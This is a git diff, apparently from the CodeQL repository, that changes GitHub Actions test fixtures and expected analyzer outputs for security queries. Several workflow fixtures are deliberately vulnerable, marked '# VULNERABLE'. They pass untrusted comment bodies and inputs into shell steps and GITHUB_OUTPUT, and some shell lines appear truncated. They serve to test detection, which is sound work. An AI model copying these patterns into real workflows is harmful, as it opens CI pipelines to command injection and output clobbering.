.../Security/CWE-918/SSRF.expected | 42 +- ...SsrfIpv6TransitionIncompleteGuard.expected | 2 + .../Security/CWE-022-TarSlip/TarSlip.expected | 60 +- .../Security/CWE-022-TarSlip/ZipSlip.expected | 12 +- .../Security/CWE-079/EmailXss.expected | 30 +- .../XsltInjection.expected | 14 +- .../Security/CWE-094/Js2Py.expected | 4 +- .../Security/CWE-1236/CsvInjection.expected | 8 +- .../PossibleTimingAttackAgainstHash.expected | 6 +- .../TimingAttackAgainstHash.expected | 2 +- .../TimingAttackAgainstHeaderValue.expected | 4 +- ...eTimingAttackAgainstSensitiveInfo.expected | 6 +- .../ConstantSecretKey.expected | 20 +- ...sageOfClientSideEncryptionVersion.expected | 12 +- .../CWE-338/InsecureRandomness.expected | 4 +- .../Security/CWE-346/CorsBypass.expected | 4 +- ...ientSuppliedIpUsedInSecurityCheck.expected | 8 +- .../LdapInsecureAuth.expected | 2 +- .../CWE-522/LdapInsecureAuth.expected | 14 +- .../Security/CWE-770/UnicodeDoS.expected | 14 +- .../CookieInjection.expected | 8 +- .../UntrustedDataToExternalAPI.expected | 14 +- .../Security/CWE-022-TarSlip/TarSlip.expected | 20 +- .../TemplateInjection.expected | 6 +- .../CommandInjection.expected | 20 +- .../ReflectedXss.expected | 8 +- .../SqlInjection.expected | 34 +- .../LdapInjection.expected | 22 +- .../HeaderInjection.expected | 2 +- .../LogInjection.expected | 10 +- .../PamAuthorization.expected | 4 +- .../CleartextLogging.expected | 50 +- .../CleartextStorage.expected | 8 +- .../CleartextStorage.expected | 10 +- .../WeakSensitiveDataHashing.expected | 26 +- .../UnsafeDeserialization.expected | 12 +- .../CWE-601-UrlRedirect/UrlRedirect.expected | 26 +- .../Security/CWE-611-Xxe/Xxe.expected | 6 +- .../XpathInjection.expected | 14 +- .../PolynomialReDoS.expected | 12 +- .../RegexInjection.expected | 8 +- .../Security/CWE-776-XmlBomb/XmlBomb.expected | 2 +- .../HardcodedCredentials.expected | 6 +- ql/ql/test/queries/bugs/OrderByConst/Foo.qll | 2 +- .../bugs/OrderByConst/OrderByConst.qlref | 3 +- .../SumWithoutDomain/SumWithoutDomain.qlref | 3 +- .../queries/bugs/SumWithoutDomain/Test.qll | 2 +- .../InlineOverlayCaller.qlref | 3 +- .../overlay/InlineOverlayCaller/Test.qll | 2 +- .../AbstractClassImport.qlref | 3 +- .../AbstractClassImportTest1.qll | 2 +- .../MissingNoInline/MissingNoInline.qlref | 3 +- .../performance/MissingNoInline/Test.qll | 2 +- .../performance/VarUnusedInDisjunct/Test.qll | 18 +- .../VarUnusedInDisjunct.qlref | 3 +- .../AcronymsShouldBeCamelCase.qlref | 3 +- .../style/AcronymsShouldBeCamelCase/Test.qll | 6 +- .../style/CouldBeCast/CouldBeCast.qlref | 3 +- ql/ql/test/queries/style/CouldBeCast/Foo.qll | 10 +- .../DataFlowConfigModuleNaming.qlref | 3 +- .../style/DataFlowConfigModuleNaming/Test.qll | 4 +- .../queries/style/DeadCode/DeadCode.qlref | 3 +- ql/ql/test/queries/style/DeadCode/Foo.qll | 10 +- .../FieldOnlyUsedInCharPred.qll | 2 +- .../FieldOnlyUsedInCharPred.qlref | 3 +- ql/ql/test/queries/style/ImplicitThis/Bad.qll | 2 +- .../test/queries/style/ImplicitThis/Bad2.qll | 2 +- .../style/ImplicitThis/ImplicitThis.qlref | 3 +- .../style/MissingParameterInQlDoc/Foo.qll | 4 +- .../MissingParameterInQlDoc.qlref | 3 +- .../MissingQualityMetadata.qlref | 3 +- .../BadQualityMaintainabilityWrongToplevel.ql | 2 +- .../testcases/BadQualityMultipleTopLevel.ql | 2 +- .../testcases/BadQualityNoToplevel.ql | 2 +- .../BadQualityReliabilityWrongToplevel.ql | 2 +- .../MissingSecurityMetadata.qlref | 3 +- .../testcases/BadNoSecurity.ql | 2 +- .../testcases/BadNoSeverity.ql | 2 +- .../style/Misspelling/Misspelling.qlref | 3 +- ql/ql/test/queries/style/Misspelling/Test.qll | 12 +- ql/ql/test/queries/style/NonDocBlock/Foo.qll | 4 +- .../style/NonDocBlock/NonDocBlock.qlref | 3 +- .../OmittableExists/OmittableExists.qlref | 3 +- .../queries/style/OmittableExists/Test.qll | 2 +- .../style/QlRefInlineExpectations/Test3.qlref | 3 +- .../test/queries/style/RedundantCast/Foo.qll | 6 +- .../style/RedundantCast/RedundantCast.qlref | 3 +- .../test/queries/style/RedundantImport/D.qll | 2 +- .../RedundantImport/RedundantImport.qlref | 3 +- .../RedundantOverride/RedundantOverride.qll | 22 +- .../RedundantOverride/RedundantOverride.qlref | 3 +- .../SwappedParameterNames.qlref | 3 +- .../style/SwappedParameterNames/Test.qll | 2 +- .../style/UseInstanceofExtension/Foo.qll | 8 +- .../UseInstanceofExtension.qlref | 3 +- .../style/UseSetLiteral/UseSetLiteral.qlref | 3 +- .../test/queries/style/UseSetLiteral/test.qll | 16 +- .../ValidatePredicateGetReturns.qlref | 3 +- .../ValidatePredicateGetReturns/test.qll | 12 +- .../DecompressionBombs.expected | 42 +- .../ImproperLdapAuth.expected | 6 +- .../InsecureRandomness.expected | 4 +- .../LdapInjection/Ldapinjection.expected | 10 +- .../TemplateInjection.expected | 10 +- .../XPathInjection/XPathInjection.expected | 22 +- .../cwe-022-ZipSlip/ZipSlip.expected | 14 +- .../UnsafeYamlDeserialization.expected | 30 +- .../ManuallyCheckHttpVerb.expected | 16 +- .../weak-params/WeakParams.expected | 10 +- .../MissingFullAnchor.expected | 8 +- .../cwe-078/KernelOpen/KernelOpen.expected | 22 +- .../UnsafeShellCommandConstruction.expected | 32 +- .../cwe-079/UnsafeHtmlConstruction.expected | 10 +- .../security/cwe-089/SqlInjection.expected | 98 +- .../UnsafeCodeConstruction.expected | 24 +- .../security/cwe-117/LogInjection.expected | 16 +- .../PolynomialReDoS.expected | 58 +- .../RegExpInjection.expected | 12 +- .../cwe-134/TaintedFormatString.expected | 28 +- .../cwe-209/StackTraceExposure.expected | 8 +- .../cwe-312/CleartextLogging.expected | 46 +- .../cwe-312/CleartextStorage.expected | 58 +- .../cwe-327/WeakSensitiveDataHashing.expected | 16 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.expected | 4 +- .../UnsafeDeserialization.expected | 56 +- .../HardcodedDataInterpretedAsCode.expected | 8 +- .../security/cwe-601/UrlRedirect.expected | 22 +- .../cwe-611/libxml-backend/Xxe.expected | 10 +- .../security/cwe-611/xxe/Xxe.expected | 48 +- .../cwe-732/WeakFilePermissions.expected | 24 +- .../cwe-798/HardcodedCredentials.expected | 24 +- .../ConditionalBypass.expected | 8 +- .../cwe-912/HttpToFileAccess.expected | 6 +- .../security/cwe-915/MassAssignment.expected | 44 +- .../cwe-918/ServerSideRequestForgery.expected | 8 +- .../DecompressionApi.expected | 6 +- .../UnsafeUnpack/UnsafeUnpack.expected | 6 +- .../CWE-079/UnsafeWebViewFetch.expected | 38 +- .../Security/CWE-089/SqlInjection.expected | 228 +- .../StaticInitializationVector.expected | 60 +- .../CWE-134/UncontrolledFormatString.expected | 48 +- .../CWE-259/ConstantPassword.expected | 54 +- .../CWE-311/CleartextStorageDatabase.expected | 280 +- .../CWE-311/CleartextTransmission.expected | 64 +- .../CleartextStoragePreferences.expected | 32 +- .../Security/CWE-327/ECBEncryption.expected | 20 +- .../CWE-328/WeakPasswordHashing.expected | 98 +- .../CWE-328/WeakSensitiveDataHashing.expected | 74 +- .../Security/CWE-730/RegexInjection.expected | 48 +- .../Security/CWE-760/ConstantSalt.expected | 38 +- .../InsufficientHashIterations.expected | 10 +- 517 files changed, 13813 insertions(+), 3297 deletions(-) create mode 100644 cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme create mode 100644 cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme create mode 100644 cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties create mode 100644 cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme create mode 100644 cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme create mode 100644 cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/upgrade.properties create mode 100644 javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md create mode 100644 javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp create mode 100644 javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql create mode 100644 javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml index de43f610827a..c2e9e17160d3 100644 --- a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -3,14 +3,14 @@ name: Reusable workflow example on: workflow_call: inputs: - config-path: # $ Source[actions/reusable-workflow-sinks] Source[actions/reusable-workflow-summaries] + config-path: required: true type: string outputs: workflow-output1: - value: ${{ jobs.job1.outputs.job-output1 }} # $ Alert[actions/reusable-workflow-summaries] + value: ${{ jobs.job1.outputs.job-output1 }} workflow-output2: - value: ${{ jobs.job1.outputs.job-output2 }} # $ Alert[actions/reusable-workflow-sources] + value: ${{ jobs.job1.outputs.job-output2 }} secrets: token: required: true @@ -26,9 +26,9 @@ jobs: env: CONFIG_PATH: ${{ inputs.config-path }} run: | - echo ${{ inputs.config-path }} # $ Alert[actions/reusable-workflow-sinks] + echo ${{ inputs.config-path }} echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 - uses: tj-actions/changed-files@v40 # $ Source[actions/reusable-workflow-sources] + uses: tj-actions/changed-files@v40 diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected index 33f7bd28de6f..0a5bfe433e91 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected @@ -1,6 +1,3 @@ -#select -| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | -| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | @@ -13,3 +10,6 @@ nodes | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | | action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref index d03797620365..e5cb225ed249 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1,2 +1 @@ -query: Models/CompositeActionsSinks.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/CompositeActionsSinks.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected index 3f13be734e2e..3be74bb8bf12 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,9 +1,3 @@ -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | edges | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | @@ -19,3 +13,9 @@ nodes | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref index fcdfec84bb78..3b833d669125 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -query: Models/CompositeActionsSources.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/CompositeActionsSources.ql + diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected index 43db3e5afa27..067edb68bb1c 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -1,5 +1,3 @@ -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | @@ -10,3 +8,5 @@ nodes | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index 7508e12c9815..ea9b7a304e6b 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -query: Models/CompositeActionsSummaries.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/CompositeActionsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected index 3a496c7751e8..18e9f0186dfd 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | edges | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | @@ -22,3 +20,5 @@ nodes | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index 8cc9921223a3..fa8344d4bf91 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -query: Models/ReusableWorkflowsSinks.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/ReusableWorkflowsSinks.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected index c9132156dad9..c76034f74d46 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | edges | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | @@ -10,3 +8,5 @@ nodes | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index 4a35c574ad5b..fe4299bdba49 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -query: Models/ReusableWorkflowsSources.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/ReusableWorkflowsSources.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected index 2a6c4269d525..8589d82d8259 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -1,5 +1,3 @@ -#select -| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | @@ -14,3 +12,5 @@ nodes | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index 7655b5f8010a..3547c8a4d07d 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -query: Models/ReusableWorkflowsSummaries.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Models/ReusableWorkflowsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml index 4780a1529f83..787fb9f588be 100644 --- a/actions/ql/test/query-tests/Models/action1/action.yml +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -1,17 +1,17 @@ name: 'Hello World' description: 'Greet someone' inputs: - who-to-greet: # id of input # $ Source[actions/composite-action-sinks] Source[actions/composite-action-summaries] + who-to-greet: # id of input description: 'Who to greet' required: true default: 'World' outputs: reflected: description: "Reflected input" - value: ${{ steps.reflector.outputs.reflected }} # $ Alert[actions/composite-action-sources] Alert[actions/composite-action-summaries] + value: ${{ steps.reflector.outputs.reflected }} tainted: description: "Reflected input" - value: ${{ steps.source.outputs.tainted}} # $ Alert[actions/composite-action-sources] + value: ${{ steps.source.outputs.tainted}} runs: using: "composite" @@ -29,23 +29,23 @@ runs: find: 'foo' replace: '' - id: sink - run: echo ${{ steps.replace.outputs.value }} # $ Alert[actions/composite-action-sinks] + run: echo ${{ steps.replace.outputs.value }} shell: bash - name: Vulnerable Set Greeting - run: echo "Hello ${{ inputs.who-to-greet }}." # $ Alert[actions/composite-action-sinks] + run: echo "Hello ${{ inputs.who-to-greet }}." shell: bash - id: reflector run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT shell: bash env: - INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} # $ Source[actions/composite-action-sources] + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} - id: changed-files uses: tj-actions/changed-files@v40 - - id: source # $ Source[actions/composite-action-sources] + - id: source run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT shell: bash env: - TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} # $ Source[actions/composite-action-sources] + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml index 73368388c9fd..01036f711481 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -6,11 +6,11 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} # $ Source + BODY: ${{ github.event.comment.body }} run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT # $ Alert + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT - id: clob2 run: | echo ${{ steps.clob1.outputs.OUTPUT_1 }} @@ -32,8 +32,8 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 # $ Source + - id: clob1 run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$(> $GITHUB_OUTPUT # $ Alert + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index 0e57bee8ac9a..614de61b0cb7 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -6,18 +6,18 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} # $ Source + BODY: ${{ github.event.comment.body }} run: | # VULNERABLE echo $BODY - echo "::set-output name=OUTPUT::SAFE" # $ Alert + echo "::set-output name=OUTPUT::SAFE" - id: clob2 env: - BODY: ${{ github.event.comment.body }} # $ Source + BODY: ${{ github.event.comment.body }} run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" - echo $BODY # $ Alert + echo $BODY - id: clob3 run: | echo ${{ steps.clob1.outputs.OUTPUT }} @@ -38,25 +38,25 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 # $ Source + - id: clob1 run: | # VULNERABLE PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | -| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | -| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | -| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> 